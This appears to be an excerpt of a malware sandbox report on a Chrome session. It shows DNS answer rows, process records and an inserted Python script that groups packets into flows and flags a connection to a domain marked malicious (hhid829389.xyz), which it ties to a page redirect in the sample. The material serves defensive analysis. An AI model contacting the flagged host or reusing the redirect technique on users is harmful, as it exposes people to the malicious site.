Feb 7, 2023 18:22:57.773257971 CET | 8.8.8.8 | 192.168.2.4 | 0xe24d | No error (0) | www.vip.icann.org | CNAME (Canonical name) | IN (0x0001) | false | ||
Feb 7, 2023 18:22:57.773257971 CET | 8.8.8.8 | 192.168.2.4 | 0xe24d | No error (0) | 192.0.47.7 | A (IP address) | IN (0x0001) | false | ||
Feb 7, 2023 18:23:00.099409103 CET | 8.8.8.8 | 192.168.2.4 | 0xb596 | No error (0) | ianawww.vip.icann.org | CNAME (Canonical name) | IN (0x0001) | false | ||
Feb 7, 2023 18:23:00.099409103 CET | 8.8.8.8 | 192.168.2.4 | 0xb596 | No error (0) | 192.0.46.8 | A (IP address) | IN (0x0001) | false | ||
Feb 7, 2023 18:23:38.765232086 CET | 8.8.8.8 | 192.168.2.4 | 0x7297 | No error (0) | 142.250.184.100 | A (IP address) | IN (0x0001) | false | ||
Feb 7, 2023 18:23:59.258929968 CET | 8.8.8.8 | 192.168.2.4 | 0x4850 | No error (0) | www.vip.icann.org | CNAME (Canonical name) | IN (0x0001) | false | ||
Feb 7, 2023 18:23:59.258929968 CET | 8.8.8.8 | 192.168.2.4 | 0x4850 | No error (0) | 192.0.47.7 | A (IP address) | IN (0x0001) | false | ||
Feb 7, 2023 18:23:59.588109016 CET | 8.8.8.8 | 192.168.2.4 | 0x1dec | No error (0) | www.vip.icann.org | CNAME (Canonical name) | IN (0x0001) | false | ||
Feb 7, 2023 18:23:59.588109016 CET | 8.8.8.8 | 192.168.2.4 | 0x1dec | No error (0) | 192.0.47.7 | A (IP address) | IN (0x0001) | false | ||
Feb 7, 2023 18:24:03.133151054 CET | 8.8.8.8 | 192.168.2.4 | 0x89fd | No error (0) | ianawww.vip.icann.org | CNAME (Canonical name) | IN (0x0001) | false | ||
Feb 7, 2023 18:24:03.133151054 CET | 8.8.8.8 | 192.168.2.4 | 0x89fd | No error (0) | 192.0.46.8 | A (IP address) | IN (0x0001) | false | ||
Feb 7, 2023 18:24:39.262686968 CET | 8.8.8.8 | 192.168.2.4 | 0x7109 | No error (0) | 142.250.184.100 | A (IP address) | IN (0x0001) | false | ||
Feb 7, 2023 18:24:39.403084040 CET | 8.8.8.8 | 192.168.2.4 | 0x37ce | No error (0) | 142.250.184.100 | A (IP address) | IN (0x0001) | false | ||
Feb 7, 2023 18:25:28.954996109 CET | 8.8.8.8 | 192.168.2.4 | 0x779b | No error (0) | ianawww.vip.icann.org | CNAME (Canonical name) | IN (0x0001) | false | ||
Feb 7, 2023 18:25:28.954996109 CET | 8.8.8.8 | 192.168.2.4 | 0x779b | No error (0) | 192.0.46.8 | A (IP address) | IN (0x0001) | false |
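Added example, not part of the report: flow reconstruction over the TCP packet table and the DNS answer table above. It groups packet rows by the sandbox-side ephemeral port so that both directions land on one record, enriches each flow with the domain and verdict from the IP table, and measures the gap between the DNS answer for a destination and the first packet the sandbox sent to it, which shows how quickly the redirect fired after resolution. The packet rows embedded below are a subset copied from the TCP table in the report's own column layout, the IP-to-answer-time map is copied from the DNS answer table, and the function names are mine; only the Python standard library is used.

```python
"""Flow reconstruction over the report's TCP packet and DNS answer tables."""
from datetime import datetime

SANDBOX_IP = "192.168.2.4"

# Copied from the report's IP table: IP -> (domain, malicious verdict).
IP_TABLE = {
    "142.250.180.174": ("clients.l.google.com", False),
    "216.58.209.45": ("accounts.google.com", False),
    "108.174.197.216": ("hhid829389.xyz", True),
    "142.250.184.100": ("www.google.com", False),
    "192.0.78.26": ("href.li", False),
}

# Copied from the DNS answer table: resolved address -> time of the first answer.
DNS_ANSWERS = {
    "142.250.180.174": "Feb 7, 2023 18:22:35.377711058 CET",
    "216.58.209.45": "Feb 7, 2023 18:22:35.377994061 CET",
    "108.174.197.216": "Feb 7, 2023 18:22:36.408771038 CET",
    "142.250.184.100": "Feb 7, 2023 18:22:38.696670055 CET",
    "192.0.78.26": "Feb 7, 2023 18:22:39.398554087 CET",
}

# A subset of the TCP packet rows, in the report's own column layout
# (Timestamp | Source Port | Dest Port | Source IP | Dest IP).
TCP_ROWS = """\
Feb 7, 2023 18:22:35.514782906 CET | 49686 | 443 | 192.168.2.4 | 142.250.180.174 |
Feb 7, 2023 18:22:35.514828920 CET | 443 | 49686 | 142.250.180.174 | 192.168.2.4 |
Feb 7, 2023 18:22:35.516421080 CET | 49687 | 443 | 192.168.2.4 | 216.58.209.45 |
Feb 7, 2023 18:22:35.516468048 CET | 443 | 49687 | 216.58.209.45 | 192.168.2.4 |
Feb 7, 2023 18:22:36.487548113 CET | 49688 | 443 | 192.168.2.4 | 108.174.197.216 |
Feb 7, 2023 18:22:36.487634897 CET | 443 | 49688 | 108.174.197.216 | 192.168.2.4 |
Feb 7, 2023 18:22:36.487763882 CET | 49688 | 443 | 192.168.2.4 | 108.174.197.216 |
Feb 7, 2023 18:22:39.372406006 CET | 443 | 49688 | 108.174.197.216 | 192.168.2.4 |
Feb 7, 2023 18:22:38.763835907 CET | 49690 | 443 | 192.168.2.4 | 142.250.184.100 |
Feb 7, 2023 18:22:39.432368040 CET | 49694 | 443 | 192.168.2.4 | 192.0.78.26 |
Feb 7, 2023 18:22:39.432426929 CET | 443 | 49694 | 192.0.78.26 | 192.168.2.4 |
"""


def parse_ts(text):
    """'Feb 7, 2023 18:22:36.487548113 CET' -> datetime; nanoseconds are cut to microseconds."""
    stamp, _tz = text.rsplit(" ", 1)
    head, frac = stamp.split(".")
    return datetime.strptime(f"{head}.{frac[:6]}", "%b %d, %Y %H:%M:%S.%f")


def parse_rows(table):
    """Yield (timestamp, sport, dport, src, dst) per table row; malformed lines are skipped."""
    for line in table.splitlines():
        cells = [c.strip() for c in line.strip().strip("|").split("|")]
        if len(cells) != 5:
            continue
        ts, sport, dport, src, dst = cells
        yield parse_ts(ts), int(sport), int(dport), src, dst


def summarize_flows(table, sandbox_ip=SANDBOX_IP):
    """Group packets into flows keyed by (sandbox port, peer); return them in start order."""
    flows = {}
    for ts, sport, dport, src, dst in parse_rows(table):
        # Normalise each packet to the sandbox side so both directions share one key.
        if src == sandbox_ip:
            key, peer_port, direction = (sport, dst), dport, "out"
        else:
            key, peer_port, direction = (dport, src), sport, "in"
        f = flows.setdefault(key, {
            "client_port": key[0], "peer": key[1], "peer_port": peer_port,
            "first_seen": ts, "last_seen": ts, "out": 0, "in": 0,
        })
        f["first_seen"] = min(f["first_seen"], ts)
        f["last_seen"] = max(f["last_seen"], ts)
        f[direction] += 1
    for f in flows.values():
        f["domain"], f["malicious"] = IP_TABLE.get(f["peer"], ("unknown", None))
        f["duration_s"] = round((f["last_seen"] - f["first_seen"]).total_seconds(), 6)
        answer = DNS_ANSWERS.get(f["peer"])
        # Time from the DNS answer to the sandbox's first packet towards that address.
        f["dns_to_first_packet_s"] = (
            round((f["first_seen"] - parse_ts(answer)).total_seconds(), 6) if answer else None
        )
    return sorted(flows.values(), key=lambda f: f["first_seen"])


def malicious_flows(table):
    """Only the flows whose peer the IP table marks as malicious."""
    return [f for f in summarize_flows(table) if f["malicious"]]


if __name__ == "__main__":
    for f in summarize_flows(TCP_ROWS):
        verdict = "MALICIOUS" if f["malicious"] else "ok"
        print(f"{f['first_seen'].time()} {f['peer']}:{f['peer_port']} ({f['domain']}) "
              f"out={f['out']} in={f['in']} dur={f['duration_s']}s "
              f"dns->first={f['dns_to_first_packet_s']}s {verdict}")
```

On the rows above, the only malicious flow is local port 49688 to 108.174.197.216:443 (hhid829389.xyz), opened well under a tenth of a second after the resolver answered, which is consistent with the unconditional window.location.replace in the sample rather than any user interaction. The same grouping applies unchanged to the full 100-row table and to a PCAP exported from the sandbox once its rows are rendered in this layout.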
Target ID: | 0 |
Start time: | 18:22:31 |
Start date: | 07/02/2023 |
Path: | C:\Program Files\Google\Chrome\Application\chrome.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff683680000 |
File size: | 2851656 bytes |
MD5 hash: | 0FEC2748F363150DC54C1CAFFB1A9408 |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
Target ID: | 1 |
Start time: | 18:22:33 |
Start date: | 07/02/2023 |
Path: | C:\Program Files\Google\Chrome\Application\chrome.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff683680000 |
File size: | 2851656 bytes |
MD5 hash: | 0FEC2748F363150DC54C1CAFFB1A9408 |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
Target ID: | 2 |
Start time: | 18:22:35 |
Start date: | 07/02/2023 |
Path: | C:\Program Files\Google\Chrome\Application\chrome.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff683680000 |
File size: | 2851656 bytes |
MD5 hash: | 0FEC2748F363150DC54C1CAFFB1A9408 |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |